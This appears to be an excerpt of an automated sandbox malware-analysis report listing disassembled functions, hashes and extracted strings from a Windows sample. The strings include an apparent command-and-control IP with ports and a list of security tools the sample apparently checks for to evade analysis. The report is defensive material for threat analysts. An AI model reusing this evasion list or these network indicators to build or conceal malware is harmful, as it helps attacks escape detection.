                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 615cccabd9d4d4bc56463e44a2cf98717ec8b73547a62705ae19231bf2828f5a
                          • Instruction ID: 35f38df5eac53050f3bddeb35c3dd787ae9c7118b816769d625ba21ced8a3248
                          • Opcode Fuzzy Hash: 615cccabd9d4d4bc56463e44a2cf98717ec8b73547a62705ae19231bf2828f5a
                          • Instruction Fuzzy Hash: D3E046BBF9EED10AF262E21C4C3D74C39B3ABB2701B0C816F8B4117583A2016D168312
                          Function 00007FF6F60842F8 Relevance: .0, Instructions: 2COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6F6080000, based on PE: true
                          • Associated: 00000000.00000002.4113613717.00007FF6F6080000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F6362000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F679E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff6f6080000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a810e6f4800dd0a946212bf55ce673faa0e725bd5ccdeadf712bf4bae6919595
                          • Instruction ID: 369e92e7905dc00c22c4fd04d7950a57238f435ff72c9bda63cb87be8e8cad93
                          • Opcode Fuzzy Hash: a810e6f4800dd0a946212bf55ce673faa0e725bd5ccdeadf712bf4bae6919595
                          • Instruction Fuzzy Hash: 4BA0022190CE02D0E749CB20EA601342378FB50704FB10131C02DD14F1BF3EB840CB40
                          Function 000001CFB95CCCF9 Relevance: 107.8, APIs: 86, Instructions: 270COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$_errno
                          • String ID:
                          • API String ID: 2288870239-0
                          • Opcode ID: e44ab7cd070652d9728940861764d1cd044dd908e6107ce7c6dd1a0b88c044b8
                          • Instruction ID: d583a1da64c24438ad11d688551b85fcbf0b016cac8f14b312dd5ac11abae091
                          • Opcode Fuzzy Hash: e44ab7cd070652d9728940861764d1cd044dd908e6107ce7c6dd1a0b88c044b8
                          • Instruction Fuzzy Hash: E0B184311E564A4BF69DFBA9C5E5BD823B2BF49340F848178980DDA9A7CF149D83C710
                          Function 000001CFB93A0A90 Relevance: 107.8, APIs: 86, Instructions: 270COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: free$_errno
                          • String ID:
                          • API String ID: 2288870239-0
                          • Opcode ID: e44ab7cd070652d9728940861764d1cd044dd908e6107ce7c6dd1a0b88c044b8
                          • Instruction ID: f63ca0f794c8e79b3fc80069c0ddeecebfad2f862f61cbd0635cd093d1a89677
                          • Opcode Fuzzy Hash: e44ab7cd070652d9728940861764d1cd044dd908e6107ce7c6dd1a0b88c044b8
                          • Instruction Fuzzy Hash: 5EB174301B25884BF689EB24C4E6FDC6376BF4C344F6C41B8985E8A2A7CF119D56C750
                          Function 000001CFB961D228 Relevance: 107.7, APIs: 86, Instructions: 180COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$ErrorFreeHeapLast_errno
                          • String ID:
                          • API String ID: 1012874770-0
                          • Opcode ID: a518f453fd134e221eeb5ca5ef16713add8aa1a07c18d8ee80b660b854a8acdc
                          • Instruction ID: d9448d8b53d0eec757f0990e5ec78e27b6fd24a7b81fdb678c4dc5007ba596b0
                          • Opcode Fuzzy Hash: a518f453fd134e221eeb5ca5ef16713add8aa1a07c18d8ee80b660b854a8acdc
                          • Instruction Fuzzy Hash: A9A1633239159681FA41AAB1C8957ED1733ABC4BC5FC5A136EA4D8A1A7CF10CE4683D0
                          Function 000001CFB960D337 Relevance: 49.3, APIs: 12, Strings: 16, Instructions: 282stringregistrysleepCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$CloseValue$DeleteOpenSleep_callnewh_errno_invalid_parameter_noinfomallocstd::exception::exception
                          • String ID: 127.0.0.1$206.238.115.146$206.238.115.146$6666$8888$Console$IpDate$o1:$o2:$o3:$p1:$p2:$p3:$t1:$t2:$t3:
                          • API String ID: 2396878867-1516111400
                          • Opcode ID: 463d9f9f0b2c7e549fb2103b7fcfc392be73fd1de31072982d2d55cec7f2432d
                          • Instruction ID: 2a832e874b60e29ea13b82a9d5778c36d30e00db2d1bcabe971504b4adf48633
                          • Opcode Fuzzy Hash: 463d9f9f0b2c7e549fb2103b7fcfc392be73fd1de31072982d2d55cec7f2432d
                          • Instruction Fuzzy Hash: 56C19B71680AD681FB10AB15E694FE82773F754BC8F81912E890A97692DF78CF4BC350
                          Function 000001CFB961B354 Relevance: 40.4, APIs: 16, Strings: 7, Instructions: 136libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL$ceil
                          • API String ID: 2643518689-1731902841
                          • Opcode ID: 9d3b7b8d73b81e0710393563afef24522285ad24608aa19952dadb9a9b69656c
                          • Instruction ID: 1a90aac00940fdf8f712cad417fef840f8149ec4591fd899211614aa31319cc2
                          • Opcode Fuzzy Hash: 9d3b7b8d73b81e0710393563afef24522285ad24608aa19952dadb9a9b69656c
                          • Instruction Fuzzy Hash: C651B830286BD281FA55AF65F854BD422B3AB59F90F48503E9C0A477A9EF7CCE478314
                          Function 000001CFB9624018 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 334COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd$BlockUnwind$std::exception::exception$BaseEntryExceptionFunctionImageLookupRaiseThrowtype_info::operator==
                          • String ID: bad exception$csm$csm$csm
                          • API String ID: 1639654010-820278400
                          • Opcode ID: 9b2d5fbee0eac8ee2ac97d402b0da82ebdcc2850a2971d8a2ad8676977ce256d
                          • Instruction ID: 09c98979dec9b4c1623e216d6a9ba9a332d0645a5287a6e6954e25921dbd8374
                          • Opcode Fuzzy Hash: 9b2d5fbee0eac8ee2ac97d402b0da82ebdcc2850a2971d8a2ad8676977ce256d
                          • Instruction Fuzzy Hash: CBE1A8326806828AFB24EF62D044BED77B3F754B88F54413AEE4907B86CB34CA52C305
                          Function 000001CFB93A3C88 Relevance: 30.2, APIs: 14, Strings: 3, Instructions: 493COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _getptd$BlockUnwind$std::exception::exception$BaseImageThrowtype_info::operator==
                          • String ID: csm$csm$csm
                          • API String ID: 3798665358-393685449
                          • Opcode ID: 18458f1114e23ce66089f8be90dc31260b8c4abc6b9c0a44086fbee8cbe3dec9
                          • Instruction ID: ad298549ee715c2c5f184fbb6ef6d234b7b351680c1be230fbbe49245f9a3382
                          • Opcode Fuzzy Hash: 18458f1114e23ce66089f8be90dc31260b8c4abc6b9c0a44086fbee8cbe3dec9
                          • Instruction Fuzzy Hash: 02F19330658A898BFB54AF68C446BEDB3FAFF54310F6C417DE44683192DB24DE428786
                          Function 000001CFB960C680 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 224stringsleepregistryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$CloseHandle$CreateEventLocalOpenSleepTimewsprintf
                          • String ID: %4d.%2d.%2d-%2d:%2d:%2d$Console\1$o1:$p1:$t1:
                          • API String ID: 441366266-1614091359
                          • Opcode ID: 7f9d41e5df0e71293687535cee31a1a5d1087bb8ce378bf28795c0271bedb4fe
                          • Instruction ID: 53135ab5495e0ab8ea7d0900a272c7d5e207cf913509dc17d128fe5a356abc42
                          • Opcode Fuzzy Hash: 7f9d41e5df0e71293687535cee31a1a5d1087bb8ce378bf28795c0271bedb4fe
                          • Instruction Fuzzy Hash: 80A1B572244AC286FB249F25E580BED77B3F785B84F50512ADA4A07B95EF38CB46C740
                          Function 000001CFB9607010 Relevance: 24.6, APIs: 2, Strings: 12, Instructions: 146windowCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: VisibleWindow
                          • String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
                          • API String ID: 1208467747-3439171801
                          • Opcode ID: 6b42bebd86f8476637ecc13a6f2ef123198be3f0257b3010f0c26ad4ef994342
                          • Instruction ID: 20e3e29122208959587ecca8d02829c2df11cb786bd823b5ad280cd404fe837d
                          • Opcode Fuzzy Hash: 6b42bebd86f8476637ecc13a6f2ef123198be3f0257b3010f0c26ad4ef994342
                          • Instruction Fuzzy Hash: 0051FE342827DB41FD98AB1AE981BD412B35B557C4F48743EAD4E0679AFB28CF52E300
                          Function 000001CFB9610090 Relevance: 24.3, APIs: 16, Instructions: 279COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast
                          • String ID:
                          • API String ID: 1452528299-0
                          • Opcode ID: 466eb3fc9af94d755cb386991d0adb2fb6d6ea7260ce2343ca81422ea1881359
                          • Instruction ID: 8765c084d8af3e124cb807ba5eacd4cdc2b7214a827d8b38d8a8bc4812824376
                          • Opcode Fuzzy Hash: 466eb3fc9af94d755cb386991d0adb2fb6d6ea7260ce2343ca81422ea1881359
                          • Instruction Fuzzy Hash: 13B1AC32741AA286FF54CB22D551BA933B3F74AB84F445539DE0A47B90EF38DA56C700
                          Function 000001CFB96041F0 Relevance: 21.1, APIs: 14, Instructions: 127networkstringCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWidelstrlensetsockopt$CreateEventIoctlgethostbynamesocket
                          • String ID:
                          • API String ID: 2536029566-0
                          • Opcode ID: 5b059df7fec4f1036d2111c5addf08278f51dd00cf6e6385f9234d437b58964f
                          • Instruction ID: 9c5b89d40a75de29fddc55550565723594d84b81037f694dff471e754c089540
                          • Opcode Fuzzy Hash: 5b059df7fec4f1036d2111c5addf08278f51dd00cf6e6385f9234d437b58964f
                          • Instruction Fuzzy Hash: 30515432614B9186F7249F65F480B9A77B7F788BA4F10522AEE9943B94DF3CC5468B00
                          Function 000001CFB960EC30 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 121processstringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CreateFile$AttributesCommandErrorExitInfoLastLineModuleNameStartuplstrlen
                          • String ID: $WinSta0\Default$h
                          • API String ID: 3224050902-50515225
                          • Opcode ID: 9788b0c6b52746562918e6521d9e674a2c14dac563895690fbe095de6b773581
                          • Instruction ID: 5ade66342acb64f0b67e1602c55c911d4ef1e5608362cda7339d9086a133975f
                          • Opcode Fuzzy Hash: 9788b0c6b52746562918e6521d9e674a2c14dac563895690fbe095de6b773581
                          • Instruction Fuzzy Hash: 5341A431644AC282FB609B24F4847DEB3B3F784790F50523AEA5947B99EF3CC6568B00
                          Function 000001CFB939F668 Relevance: 19.6, APIs: 13, Instructions: 135COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: free$__free_lconv_mon__free_lconv_num_errno
                          • String ID:
                          • API String ID: 2822633559-0
                          • Opcode ID: 17f21d004e540957a027c9f4d461f3e374196ffda932605389c2d393b89cf90f
                          • Instruction ID: e798bfaf5c06fe67c18f44df73b8b6e47d86daeb11484f425a6411ac0b14df30
                          • Opcode Fuzzy Hash: 17f21d004e540957a027c9f4d461f3e374196ffda932605389c2d393b89cf90f
                          • Instruction Fuzzy Hash: A5411A301619898AFF99AB58C4A1FE973B6FF58344F7C007D941ACA2D2CB21DD92CB11
                          Function 000001CFB9617ABC Relevance: 19.6, APIs: 13, Instructions: 90COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$ErrorFreeHeapLast__free_lconv_mon__free_lconv_num_errno
                          • String ID:
                          • API String ID: 518839503-0
                          • Opcode ID: 8a5bcbf2f5b03e6271d90b4b13e59cdc641d44b15ea147a65484282a41bab39a
                          • Instruction ID: acb7339c71762d6e53053dc36f849fbf1ced5cdf1f59b967de879192c93b10da
                          • Opcode Fuzzy Hash: 8a5bcbf2f5b03e6271d90b4b13e59cdc641d44b15ea147a65484282a41bab39a
                          • Instruction Fuzzy Hash: 3D410D326426D285FF599F65D450BE92373EB84B85F496439DA094B2A5CF28CE828390
                          Function 000001CFB961C780 Relevance: 18.1, APIs: 12, Instructions: 149COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _fileno$_errno$_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 482796045-0
                          • Opcode ID: b0048c473e875f5361daaf0fd704adfa276cbcd020ef96e2e5c96f80651a0148
                          • Instruction ID: a3ac2d87b872ba6f9dae062dd99476613b357be62748e0111656ba71d058cc0a
                          • Opcode Fuzzy Hash: b0048c473e875f5361daaf0fd704adfa276cbcd020ef96e2e5c96f80651a0148
                          • Instruction Fuzzy Hash: BA51F6312945E241FB649B3BC5917FC2773A7467A4F14232AEA6A476D1EB2CCE138300
                          Function 000001CFB93A34C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 150COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _getptd$CreateFrameInfo
                          • String ID: csm
                          • API String ID: 4181383844-1018135373
                          • Opcode ID: f7c0f49ba4beedef2b7976ee9fce1622404532abdfe6423b84f5cde918012730
                          • Instruction ID: f673afed8ed3a994c3d3f48f6f3673fc9a26aefe03707b0f66abba1ddb6dc5c8
                          • Opcode Fuzzy Hash: f7c0f49ba4beedef2b7976ee9fce1622404532abdfe6423b84f5cde918012730
                          • Instruction Fuzzy Hash: 8C517170558A848FE7A4EF18C045BE9B3F5FF59311F28017DE48AC3662DB30E9428B82
                          Function 000001CFB9623854 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 93COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd$CreateFrameInfo_amsg_exit
                          • String ID: csm
                          • API String ID: 2825728721-1018135373
                          • Opcode ID: ab259648624af678573ba89838dca0527dad1af5f5945908d59d38f32e1ff19f
                          • Instruction ID: 2e86a8a91b97a8e223385b694fed0f12118920e5ce7a8a3de2bda8d7842489f0
                          • Opcode Fuzzy Hash: ab259648624af678573ba89838dca0527dad1af5f5945908d59d38f32e1ff19f
                          • Instruction Fuzzy Hash: AE415D36544BC282E670AB12E440BEAB7B6F785B94F04523AEF9D07B85DF39C956C700
                          Function 000001CFB961EE80 Relevance: 16.8, APIs: 11, Instructions: 254COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$_errno$EnvironmentVariable__wtomb_environ_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 101574016-0
                          • Opcode ID: ee1a25ee45c2640c7852e1812db1e641d052142c21b4cb8a2d2def99178db119
                          • Instruction ID: 7e385534f2d2bbe3585619cadc4a76cb84b97aecc060e16b688d0b0888dc35e1
                          • Opcode Fuzzy Hash: ee1a25ee45c2640c7852e1812db1e641d052142c21b4cb8a2d2def99178db119
                          • Instruction Fuzzy Hash: 2DA1D231281BE285FA15AB16E910BE966B7FB80BD4F24A53C9E59477D5DF34CE438300
                          Function 000001CFB9605F50 Relevance: 16.6, APIs: 11, Instructions: 114COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalErrorLastSection$EnterLeave
                          • String ID:
                          • API String ID: 2124651672-0
                          • Opcode ID: f1cd334ff1bf03e48cfd9cd4b3e080a5c9426922d43e00ec9972468f940fc80e
                          • Instruction ID: 40d885cac5990621e7297c2d1291a2c6af0e8d9f567f45a3b5639c5094501b60
                          • Opcode Fuzzy Hash: f1cd334ff1bf03e48cfd9cd4b3e080a5c9426922d43e00ec9972468f940fc80e
                          • Instruction Fuzzy Hash: 07416E322802D68AF754AF25D588F9E73BBFB59791F01523A9A1783290DF38CD46C710
                          Function 000001CFB96063A0 Relevance: 16.6, APIs: 11, Instructions: 98networkCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSection$EnterErrorLastLeave
                          • String ID:
                          • API String ID: 4082018349-0
                          • Opcode ID: f9e10af98ba3564db1dda6833011695fd4e85ea4eaf2b3d34699dd1ebcf9231e
                          • Instruction ID: 6d173fcdd5ea3bf7a4ce33c09462485fe7e306ee5b577ff168753604755d1c43
                          • Opcode Fuzzy Hash: f9e10af98ba3564db1dda6833011695fd4e85ea4eaf2b3d34699dd1ebcf9231e
                          • Instruction Fuzzy Hash: 3F3193303806D282F6146B26E9C5BE97373E765BA0F04923D9E66477D5DF28DD878700
                          Function 000001CFB960EB50 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 52registrystringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseValue$CreateDeleteOpenlstrlen
                          • String ID: AppEvents$Network
                          • API String ID: 3197061591-3733486940
                          • Opcode ID: 32c959de67c7d378e92ef510da6cbe0d70bc71428da5d553c9f85ddad007468a
                          • Instruction ID: 07934d57612afba409887ac19e64c23437e473628a0d94323cf73a9edd34d21c
                          • Opcode Fuzzy Hash: 32c959de67c7d378e92ef510da6cbe0d70bc71428da5d553c9f85ddad007468a
                          • Instruction Fuzzy Hash: 65215C76314A8182FB10AB12F944B8AB372F794BE5F440126EE5907B58CFBCC64ADB04
                          Function 000001CFB961E9AC Relevance: 15.2, APIs: 10, Instructions: 250COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide$Info
                          • String ID:
                          • API String ID: 1775632426-0
                          • Opcode ID: ba1efee0f892db86b8c289ae95d93411e85fb81a9820fec0fc76b2431202ca1c
                          • Instruction ID: c2d8eb8880a749331d632c99716f78e34bf95149d3bd0c391a3dcbc2ebe6cd69
                          • Opcode Fuzzy Hash: ba1efee0f892db86b8c289ae95d93411e85fb81a9820fec0fc76b2431202ca1c
                          • Instruction Fuzzy Hash: 8AA1C5727806E245FB729F15D800BEA6EF3B7447A4F48923AA96A477C5DB34CE42C340
                          Function 000001CFB961CCE4 Relevance: 15.2, APIs: 10, Instructions: 206COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
